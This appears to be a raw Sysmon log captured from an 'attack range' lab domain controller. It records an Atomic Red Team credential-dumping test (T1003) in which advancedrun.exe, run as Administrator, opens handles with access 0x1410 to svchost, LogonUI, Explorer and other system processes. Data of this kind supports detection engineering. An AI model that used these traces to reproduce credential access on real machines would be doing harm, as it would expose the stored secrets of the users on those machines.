17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942723Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942722Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003942721Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003942720Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003942718Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003942717Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003942716Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003942714Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942713Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942712Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003942711Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942710Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942708Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942707Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003942706Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942705Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942704Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
